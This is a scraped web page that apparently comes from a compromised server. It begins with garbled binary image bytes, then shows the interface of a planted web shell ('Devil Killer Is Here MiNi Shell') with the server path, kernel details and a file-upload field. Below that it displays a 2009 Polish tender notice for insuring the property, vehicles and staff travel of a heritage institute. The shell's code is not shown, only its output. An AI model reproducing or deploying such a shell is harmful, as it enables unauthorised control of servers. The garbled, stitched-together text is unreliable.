JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090123/8340-N-2009.html

<p class="kh_header"><b>Warszawa: usługa ubezpieczenia mienia, pojazdów mechanicznych i obsługi prawnej Krajowego Ośrodka Badań i Dokumentacji Zabytków</b><br>
<b>Numer ogłoszenia: 8340 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krajowy Ośrodek Badań i Dokumentacji Zabytków , ul. Szwoleżerów 9, 00-464 Warszawa, woj. mazowieckie, tel. 022 6293791, faks 022 6226595.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kobidz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa ubezpieczenia mienia, pojazdów mechanicznych i obsługi prawnej Krajowego Ośrodka Badań i Dokumentacji Zabytków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa ubezpieczenia mienia, pojazdów mechanicznych i obsługi prawnej Krajowego Ośrodka Badań i Dokumentacji Zabytków. Przedmiotu zamówienia obejmuje:

1.	Ubezpieczenie budynków i budowli od ognia i innych zdarzeń losowych w pełnym zakresie w tym w szczególności za szkody polegające na: utracie, zniszczeniu lub uszkodzeniu mienia na skutek nagłego, niespodziewanego i niezależnego od woli Zamawiającego zdarzenia, m.in: pożar, bezpośrednie i pośrednie uderzenie pioruna, wybuch, upadek statku powietrznego, huragan, deszcz nawalny, powódź, lawina, ciężar śniegu, działanie mrozu, grad, trzęsienie ziemi, zapadanie lub osuwanie się ziemi, zalanie przez wydostawanie się wody i innych cieczy lub pary z urządzeń wodno - kanalizacyjnych lub technologicznych, dym, uderzenie pojazdu, huk ponaddźwiękowy, dewastacja (rozumiane jako umyślne uszkodzenie lub zniszczenie ubezpieczonego mienia przez osoby trzecie) z włączeniem przepięć, aktów terroru, upadku drzew i masztów a także refundacji kosztów uprzątnięcia pozostałości po szkodzie, łącznie z kosztami rozbiórki i demontażu części niezdatnych do użytku, do wysokości sumy ubezpieczenia i refundacji kosztów zabezpieczenia mienia przed uszkodzeniem w przypadku bezpośredniego zagrożenia zdarzeniem oraz koszty związane z ratunkiem dotkniętego szkodą mienia, mające na celu niedopuszczenie do zwiększenia strat.  Koszty te pokrywane są bez względu na wynik działań zabezpieczających i ratowniczych do wysokości  sumy ubezpieczenia o wartości  = 12.718.000,00 PLN
2.	Ubezpieczenie nakładów inwestycyjnych od ognia i innych zdarzeń losowych w pełnym zakresie w tym w szczególności za szkody polegające na: utracie, zniszczeniu lub uszkodzeniu mienia na skutek nagłego, niespodziewanego i niezależnego od woli Zamawiającego zdarzenia, m.in: pożar, bezpośrednie i pośrednie uderzenie pioruna, wybuch, upadek statku powietrznego, huragan, deszcz nawalny, powódź, lawina, ciężar śniegu, działanie mrozu, grad, trzęsienie ziemi, zapadanie lub osuwanie się ziemi, zalanie przez wydostawanie się wody i innych cieczy lub pary z urządzeń wodno - kanalizacyjnych lub technologicznych, dym, uderzenie pojazdu, huk ponaddźwiękowy, dewastacja (rozumiane jako umyślne uszkodzenie lub zniszczenie ubezpieczonego mienia przez osoby trzecie) z włączeniem przepięć, aktów terroru, upadku drzew i masztów a także refundacji kosztów uprzątnięcia pozostałości po szkodzie, łącznie z kosztami rozbiórki i demontażu części niezdatnych do użytku, do wysokości sumy ubezpieczenia i refundacji kosztów zabezpieczenia mienia przed uszkodzeniem w przypadku bezpośredniego zagrożenia zdarzeniem oraz koszty związane z ratunkiem dotkniętego szkodą mienia, mające na celu niedopuszczenie do zwiększenia strat.  Koszty te pokrywane są bez względu na wynik działań zabezpieczających i ratowniczych do wysokości  sumy ubezpieczenia o wartości  = 1.265.435,00 PLN
3.	Ubezpieczenie mienia ruchomego (m.in. maszyny, urządzenia, wyposażenie) od ognia i innych zdarzeń losowych w pełnym zakresie w tym w szczególności za szkody polegające na: utracie, zniszczeniu lub uszkodzeniu mienia na skutek nagłego, niespodziewanego i niezależnego od woli Zamawiającego zdarzenia, m.in: pożar, bezpośrednie i pośrednie uderzenie pioruna, wybuch, upadek statku powietrznego, huragan, deszcz nawalny, powódź, lawina, ciężar śniegu, działanie mrozu, grad, trzęsienie ziemi, zapadanie lub osuwanie się ziemi, zalanie przez wydostawanie się wody i innych cieczy lub pary z urządzeń wodno - kanalizacyjnych lub technologicznych, dym, uderzenie pojazdu, huk ponaddźwiękowy,  dewastacja (rozumiane jako umyślne uszkodzenie lub zniszczenie ubezpieczonego mienia przez osoby trzecie) z włączeniem przepięć, aktów terroru, upadku drzew i masztów a także refundacji kosztów uprzątnięcia pozostałości po szkodzie, łącznie z kosztami rozbiórki i demontażu części niezdatnych do użytku, do wysokości sumy ubezpieczenia i refundacji kosztów zabezpieczenia mienia przed uszkodzeniem w przypadku bezpośredniego zagrożenia zdarzeniem oraz koszty związane z ratunkiem dotkniętego szkodą mienia, mające na celu niedopuszczenie do zwiększenia strat.  Koszty te pokrywane są bez względu na wynik działań zabezpieczających i ratowniczych do wysokości  sumy ubezpieczenia o wartości  = 2.244.911,00 PLN

Szkodowość z ubezpieczenia mienia od ognia i innych zdarzeń losowych w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania:

2006r. - 527,45  PLN zalanie siedziby; 
2006r. -  4.644,20 PLN - podczas burzy upadające drzewo uszkodziło ogrodzenie parku;
2006r.- 954,33 PLN zalanie spowodowane awarią grzejników.
2008r.- 2.021,94 PLN zalanie siedziby
2008r. -778,24 PLN  zalanie siedziby
Wysokość roszczenia odpowiadała wysokości poniesionej szkody.

4.	Ubezpieczenie mienia ruchomego ( maszyny urządzenia wyposażenie )  od kradzieży z włamaniem i rabunku z dewastacją o wartości = 2.244.911,00 PLN oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia;

Szkodowość z ubezpieczenia mienia ruchomego od kradzieży z włamaniem i rabunku w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała
 
5.	Ubezpieczenie elementów stałych (elementy zamontowane lub wbudowane na stałe, w sposób uniemożliwiający ich odłączenie bez użycia narzędzi np: meble wbudowane na stałe, zabudowy wnęk, pawlaczy i ścian, stolarka okienna i drzwiowa, zabezpieczenia przeciw włamaniowe drzwi i okien, wykładziny ścian , podłóg, schodów i sufitów, powłoki malarskie, gładzie szpachle, podłogi i podwieszane sufity, instalacje i urządzenia sanitarne, obudowy instalacji i grzejników) od skutków kradzieży z włamaniem i rabunku o wartości =20 000 PLN na każdą siedzibę KOBIDZ oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia

Szkodowość z ubezpieczenia w ww zakresie w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.

6.	Ubezpieczenie szyb i przedmiotów szklanych od stłuczenia o wartości = 34.000,00 PLN oraz koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia.

Szkodowość z ubezpieczenia szyb i przedmiotów szklanych w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.

7.	Ubezpieczenie elektroniki stacjonarnej i mobilnej wg wartości odtworzeniowej (wartością odtworzeniową jest cena zakupu sprzętu o tych samych albo najbardziej zbliżonych parametrach technicznych, łącznie z kosztami pochodnymi związanymi z tym zakupem tj. kosztami demontażu, ponownego montażu, transportu itp. ) od wszystkich ryzyk.
a.	sprzęt stacjonarny o wartości = 2.361.054,00 PLN    
b.	sprzęt mobilny (aparaty fotograficzne i akcesoria, laptopy, dalmierze, skaner laserowy, niwelatory, kamery, rzutniki-projektory, tel. komórkowe  w ilości  41 sztuk, wilgotnościomierze)  o wartości = 1.402.500,00 PLN

oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia.

Szkodowość z ubezpieczenia sprzętu elektronicznego w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania: nie wystąpiła.

Przedmiot zamówienia obejmuje również:

1.	Ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzenia statutowej działalności i posiadanego mienia oraz mienia będącego w pieczy na podstawie umów cywilnoprawnych (odpowiedzialność deliktowa) oraz odpowiedzialność kontraktowa związana z wykonywaniem umów w ramach działalności statutowej KOBIDZ (Statut KOBIDZ znajduje się pod adresem:www.kobidz.pl). Ubezpieczenie od odpowiedzialności cywilnej (deliktowej i kontraktowej) obejmuje koszty wynagrodzenia rzeczoznawców powołanych przez zakład ubezpieczeń lub za jego zgodą, w celu ustalenia okoliczności i rozmiaru szkody. -suma gwarancyjna na jedno i wszystkie zdarzenia 1.000.000,00 PLN odpowiedzialność cywilna deliktowa; -suma gwarancyjna na jedno i wszystkie zdarzenia 1.000.000,00 PLN odpowiedzialność cywilna kontraktowa.


Rodzaj kontraktów: Umowy zlecenia zawarte z Wykonawcami w związku z realizacją celów statutowych. Treść ww umów negocjowana indywidualnie z Wykonawcami.

Szkodowość z ubezpieczenia od OC w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania: wystąpiła.
2008r.  wypłacono 1000 PLN 

2.	Ubezpieczenie gotówki od kradzieży z włamaniem i rabunku w lokalach we wszystkich siedzibach KOBIDZ suma ubezpieczenia 10.000,00 PLN na każdą siedzibę oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia.


Szkodowość z ubezpieczenia w ww zakresie w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.


3.	Ubezpieczenie gotówki od ognia i innych zdarzeń losowych w pełnym zakresie w lokalach we wszystkich siedzibach KOBIDZ- suma ubezpieczenia 10.000,00 PLN na każdą siedzibę oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia.

Szkodowość z ubezpieczenia w ww zakresie w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.


4.	Ubezpieczenie gotówki od rabunku w transporcie  w obrębie jednej miejscowości  we wszystkich siedzibach KOBIDZ- suma ubezpieczenia 10.000,00 PLN na każdą siedzibę.

Transport gotówki jest dokonywany 2x w tygodniu.


Szkodowość z ubezpieczenia w ww zakresie w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.

   
5.	Ubezpieczenie floty pojazdów w zakresie OC, AC+KR, NNW kom. Assistance oraz szyby (od wszelkich ryzyk- wszystkie zdarzenia powodujące uszkodzenie szyb w pojazdach) sumy ubezpieczenia w zakresie określonym w tabeli stanowiącej załącznik nr 2 do Opisu Przedmiotu Zamówienia.

Szkodowość z ubezpieczenia OC, AC, NNW w okresie ostatnich 2 lat poprzedzających datę ogłoszenia postępowania: nie wystąpiła, 

Każdy pojazd mechaniczny jest wyposażony wyłącznie w 2 oryginalne klucze.

6.	Ubezpieczenie ochrony prawnej związanej z posiadaniem i użytkowaniem pojazdu w postępowaniu sądowym i pozasądowym (koszty pomocy prawnej związanej z działaniami na rzecz ochrony prawnych interesów Zamawiającego związanych ze zdarzeniem z udziałem pojazdów lub dotyczących pojazdów wyszczególnionych w załączniku nr 2 do Opisu przedmiotu zamówienia, które spowodowało wystąpienie szkody: zarówno koszty dochodzenia jak i postępowania przesądowego i sądowego) w zakresie:
a)	Zakres minimalnej ochrony prawnej Właściciela Pojazdu i Kierowcy: dochodzenie roszczeń odszkodowawczych z tytułu czynów niedozwolonych za szkody na osobie lub mieniu, jak również obrona przed roszczeniami odszkodowawczymi osób trzecich przeciwko Zamawiającemu w tym roszczenia wynikające z działań wojennych, zamieszek, rozruchów, katastrof i blokad dróg,  roszczeń wzajemnych pomiędzy współpasażerami oraz pomiędzy Współpasażerami a Ubezpieczonym;
b)	Minimalny zakres terytorialny: Europa;
c)	Suma ubezpieczenia 5. 000 Euro
Ubezpieczenia Podróży Zagranicznych
Ubezpieczony: Pracownicy Ubezpieczającego w czasie zagranicznych wyjazdów  służbowych  związanych  z  wykonywaniem  pracy umysłowej- pracownicy etatowi.                          
Przedmiot ubezpieczenia:
Koszty leczenia  i usługi assistance, Następstwa Nieszczęśliwych  wypadków,  Odpowiedzialność  cywilna w życiu prywatnym. Czas trwania podróży: średnio 7 dni. Rodzaj wykonywanej pracy: udział w konferencjach i pracach archeologicznych. Szkodowość w 2007r. i 2008r. - 0 PLN                                
Miejsce ubezpieczenia: 
Ubezpieczenie   obowiązuje   na  terytorium  wszystkich państw   świata  z   wyłączeniem  terytorium Rzeczypospolitej    Polskiej   i   kraju zamieszkania Ubezpieczonego Forma ubezpieczenia: Grupowa w formie polisy otwartej 450 osobodni.    .
                
Zakres ubezpieczenia                                                           
Koszty leczenia:                                                             
a)	badania i zabiegi ambulatoryjne zalecone przez lekarza;                  
b)	konsultacje lekarskie;                                                   
c)	dojazd lekarza z najbliższej placówki służby zdrowia do miejsca zakwaterowania Ubezpieczonego, w przypadku gdy wymaga tego jego stan zdrowia; 
d)	zakup płynów infuzyjnych, lekarstw i środków opatrunkowych, a także ortopedycznych środków pomocniczych;                                           
e)	naprawę protez;                                                          
f)	transport Ubezpieczonego z miejsca nieszczęśliwego wypadku lub nagłego zachorowania do najbliższego szpitala lub placówki służby zdrowia;             
g)	pobyt w szpitalu tj. leczenie, badania, zabiegi i operacje, których przeprowadzenia nie można było, ze względu na stan zdrowia Ubezpieczonego,
h)	-poród, który nastąpi przed 32 tygodniem ciąży i związaną z nim opiekę nad  matką i dzieckiem do równowartości 2.000 euro;                                 
i)	- jedną wizytę lekarską związaną z ciążą i związany z nią transport do placówki medycznej, do równowartości 150 euro dla wszystkich zachorowań nie związanych z porodem, wymagających udzielenia natychmiastowej pomocy lekarskiej;                                                                    
j)	-leczenie stomatologiczne w przypadku ostrych stanów bólowych i zapalnych do równowartości 120 euro dla wszystkich zachorowań, wymagających udzielenia       natychmiastowej pomocy lekarskiej, zaistniałych w okresie ochrony ubezpieczeniowej;                                                              
Wykonawca jest zobowiązany również:
a)	odłożyć do czasu powrotu na teren Rzeczypospolitej Polskiej lub kraju zamieszkania  Ubezpieczonego:
-honoraria lekarskie; 
-transport Ubezpieczonego do innego szpitala, jeżeli placówka medyczna, w której        Ubezpieczony jest hospitalizowany, nie zapewnia opieki medycznej dostosowanej do jego stanu zdrowia, zgodnie z pisemnym zaleceniem lekarza prowadzącego leczenie; 

Usługi typu Assistance                  
a)	Transport Ubezpieczonego na teren Rzeczypospolitej Polskiej lub kraju zamieszkania;                                                                   
b)	Transport zwłok Ubezpieczonego (zakup trumny przewozowej do    równowartości 1000 euro);                                                       
c)	Przekazanie informacji osobom bliskim;                                               
d)	Pomoc w przypadku kradzieży lub utraty dokumentów;                     
e)	Pomoc w odzyskaniu i ponownym wysłaniu bagażu;                         
f)	Przedłużenie ochrony ubezpieczeniowej w sytuacjach nagłych;  
g)	Transport osób towarzyszących Ubezpieczonemu w podróży zagranicznej w razie jego śmierci;                                                              
h)	Opiekę nad towarzyszącymi Ubezpieczonemu w podróży zagranicznej niepełnoletnimi dziećmi (do równowartości 100 euro za dobę, maksymalnie 7 dób);
i)	Pokrycie kosztów pobytu i transportu osoby towarzyszącej Ubezpieczonemu w podróży zagranicznej (do równowartości 100 euro za dobę, maksymalnie 7 dób);                                                             
j)	Transport i pobyt osoby wezwanej do Ubezpieczonego (do równowartości 100 euro za dobę, maksymalnie 7 dób);                                           
k)	Kierowcę zastępczego (pokrycie kosztów do równowartości 1.000 euro);
l)	Informacje przed podróżą;                                             
m)	Zastępstwo w podróży służbowej (do równowartości 500 euro);           
n)	Pokrycie kosztów poszukiwań w górach i na morzu (do równowartości 5.500 euro);                                                                    
o)	Pokrycie kosztów ratownictwa w górach i na morzu (do równowartości 5.500 euro);                                                                    
p)	Pomoc w przypadku opóźnienia lotu (do równowartości 100 euro);        
q)	Wyżywienie i zakwaterowanie Ubezpieczonego za granicą w celu rekonwalescencji (do równowartości 100 euro za dobę, maksymalnie 7 dób);        
r)	Pomoc w przypadku konieczności wcześniejszego powrotu Ubezpieczonego na teren           Rzeczypospolitej Polskiej  lub kraju zamieszkania Ubezpieczonego;       
s)	Kontynuację zaplanowanej podróży;                                      
t)	Pomoc prawną (do równowartości 1.200 euro);                            
u)	Wypłatę w poczet kaucji (do równowartości 1.200 euro);                                                                                       
v)	Dosłanie niezbędnych przedmiotów osobistych;                           
w)	Pomoc finansową (do równowartości 500 euro) Opiekę nad zwierzętami domowymi towarzyszących Ubezpieczonemu w podróży zagranicznej;                                                           
x)	Pomoc tłumacza (do równowartości 250 euro);                            
y)	Organizację kontynuacji na terenie Rzeczypospolitej Polskiej leczenia rozpoczętego za granicą.                                                        
Ubezpieczenie Następstw Nieszczęśliwych Wypadków                               
Przedmiotem   ubezpieczenia  jest  życie  i  zdrowie  Ubezpieczonego. Ubezpieczenie obejmuje gwarancję  wypłaty następujących świadczeń: 1) świadczenie na wypadek trwałego inwalidztwa - wypłacane jako procent sumy ubezpieczenia wskazanej w dokumencie ubezpieczenia w oparciu o Tabelę stopnia trwałego inwalidztwa zamieszczoną w OWU Podróży Zagranicznych lub świadczenie na wypadek trwałego uszczerbku na zdrowiu - wypłacane jako procent sumy ubezpieczenia wskazanej w dokumencie ubezpieczenia w oparciu o Tabelę Oceny Procentowej Trwałego  Uszczerbku na Zdrowiu oraz świadczenie na wypadek śmierci w wyniku nieszczęśliwego wypadku powstałej w okresie do 12 miesięcy od daty  nieszczęśliwego wypadku. Świadczenie wypłacane jest  w wysokości 100 %  sumy ubezpieczenia na wypadek trwałego uszczerbku na zdrowiu, wskazanej w dokumencie ubezpieczenia; 2) ryzyko związane z nieszczęśliwym wypadkiem poniesionym na skutek działań wojennych lub aktów terroru, do których doszło nagle w czasie pobytu Ubezpieczonego na terytorium       danego kraju.

Ubezpieczenie Odpowiedzialności Cywilnej w życiu prywatnym                     
Przedmiotem ubezpieczenia jest odpowiedzialność cywilna Ubezpieczonego za szkody na osobie i na rzeczy wyrządzone czynem niedozwolonym (odpowiedzialność deliktowa) osobom trzecim poza granicami Rzeczypospolitej Polskiej i kraju zamieszkania Ubezpieczonego, w związku  z wykonywaniem czynności życia prywatnego.
W ramach tego ryzyka objęte są następujące usługi:
a)	jedna wizyta lekarską do równowartości 300 euro;
b)	hospitalizacja do równowartości 2.000 euro;
c)	transport Ubezpieczonego na teren Rzeczypospolitej Polskiej lub kraju zamieszkania Ubezpieczonego          (koszt transportu nie pomniejsza sumy ubezpieczenia kosztów leczenia i natychmiastowej pomocy assistance);
d)	transport zwłok Ubezpieczonego na teren Rzeczypospolitej Polskiej lub kraju zamieszkania Ubezpieczonego (koszt transportu nie pomniejsza sumy ubezpieczenia kosztów leczenia i natychmiastowej pomocy assistance);
Ubezpieczenie Bagażu podróżnego  
Ubezpieczenie obejmuje bagaż podróżny pracowników Zamawiającego tj.: walizy, plecaki, torby, nesesery, paczki i temu podobne pojemniki wraz z ich zawartością w postaci odzieży i rzeczy osobistych należących do pracowników Zamawiającego towarzyszących mu podczas jego podróży zagranicznej. Ochroną ubezpieczeniową objęty jest bagaż podróżny, jeżeli znajduje się pod bezpośrednią opieką Zamawiającego lub jeżeli: 1) Zamawiający: powierzył bagaż zawodowemu przewoźnikowi do przewozu na podstawie odpowiedniego dokumentu przewozowego; 2) Zamawiający oddał bagaż za pokwitowaniem do przechowalni bagażu; 3) Zamawiający zostawił bagaż w zamkniętym na zamek mechaniczny lub elektroniczny pomieszczeniu zajmowanym przez Zamawiającego w miejscu zakwaterowania; 4) Zamawiający zostawił bagaż w zamkniętym indywidualnym pomieszczeniu bagażowym na dworcu (kolejowym, autobusowym, lotniczym);  5) Zamawiający umieścił bagaż w zamkniętym luku bagażowym lub zamkniętym (na zamek mechaniczny bądź elektroniczny) bagażniku samochodu, stojącego na parkingu strzeżonym, a zaginięcie bagażu jest potwierdzone wystawieniem odpowiedniego dokumentu; 6) Zamawiający umieścił bagaż w zamkniętej na zamek mechaniczny lub elektroniczny jednostce pływającej lub kabinie przyczepy samochodowej (kempingowej) znajdujących się na terenie strzeżonym.  W przypadku sprzętu tj. telefony przenośne, sprzęt fotograficzny i kamery video, przenośny sprzęt komputerowy, sprzęt służący do odtwarzania i nagrywania dźwięku, gry wideo ubezpieczenie obejmuje ryzyko jego utraty w przypadku zrabowania sprzętu, który był w posiadaniu (noszony przy sobie w trakcie podróży) pracownika Zamawiającego.
Sumy Ubezpieczenia w PLN (na każdą osobę i na wszystkie zdarzenia):
Ubezpieczenie kosztów leczenia i usług typu assistance - 400.000,00
Ubezpieczenie Następstw Nieszczęśliwych Wypadków - uszczerbek na zdrowiu - 60.000,00                                                                        
Ubezpieczenie Następstw Nieszczęśliwych Wypadków - śmierć - 60.000,00.          
Ubezpieczenie    odpowiedzialności   cywilnej   w   życiu prywatnym za szkody na osobie - 300.000,00.                                                     
Ubezpieczenie    odpowiedzialności   cywilnej   w   życiu prywatnym za szkody na rzeczy - 300.000,00.
Ubezpieczenie Bagażu podróżnego-  4.000,00.
Jako szkodowość Zamawiający rozumie szkody wypłacone, zgłoszone roszczenia i odmówione, zgłoszone roszczenia, które aktualnie figurują jako rezerwy szkodowe.

Zamawiający prowadzi wyłącznie statutową działalność wg PKD- 9252B.

Mienie i pojazdy mechaniczne obejmujące zakres ubezpieczenia są własnością Zamawiającego z wyjątkiem budynku w Grodzisku Maz. -własność Skarbu   Państwa ( sprawowany trwały zarząd przez Zamawiającego).

Zamawiający osiągnął przychodu z tytułu odszkodowania w roku 2008r. w zakresie objętym niniejszym przedmiotem zamówienia w wysokości 3.978,50 PLN

Obrót za rok 2008r.: 622 362 PLN. Przychody  netto Zamawiającego ze sprzedaży wyrobów i usług  w 2008r. - 440.000,00 PLN.

Ubezpieczenie od ognia na sumy stałe obliczono wg wartości odtworzeniowej, natomiast od kradzieży na pierwsze ryzyko wg wartości odtworzeniowej

Zakres terytorialny ubezpieczeń: ubezpieczenia mienia - terytorium Rzeczpospolitej Polski lub wg ww opisów; ubezpieczenia pojazdów mechanicznych - terytorium Europy;

Załacznik nr 2 do Opisu przedmiotu zamówienia wg następujacych kategorii: Lp,Marka,Rodzaj,Nr rej.,Poj-ład,l.osób,Su AC,Nr nadwozia - ramy,Nr silnika, Przebieg Ubezpieczenie OC do, Ubezpieczenie AC do, Data badania technicznego, Rok produkcji, Autoalarm, Immobiliser, Ośrodek: 1) Toyota Land Cruiser, osobowy, WI 1050 E, 2982, 5, 146.700,00, JTEBZ29J000101850, 1KD1418230, 66 000,31.01.2009r., 31.01.2009r., 26.04.2009r., 2006r., fabryczny, MULTI LOCK immobilaiser, Warszawa; 2) Renault FC Kangoo Express, ciężarowy, WI 7839 G, 1461, 5, 54.700,00, VF1FC1EHF38188659,-, 22 000,31.01.2009r., 31.01.2009r., 24.08.2010r., 2006, fabryczny, -, Łęknica; 3)Skoda SUPERB 1,8 T, osobowy, WI 6767A, 1781, 5, 64.700,00, TMBDL63U159093768, AWT170860, 113 900,31.01.2009r., 31.01.2009r., 06.05.2010r., 2005, fabryczny, BEAR LOCK immobilaiser, Warszawa; 4)PEUGEOT 306, osobowy, WI 3642 K, 1587, 5, 8300,00 ,VF 37BNFTF33208976, 0935278, 215 200, 01.01.2009r., 01.01.2009r., 24.11.2009r., 2001, fabryczny, -, Ziel. Góra; 5) Renault Trafic, osobowy, WI 2022c 1998, 8, 51.600,00, 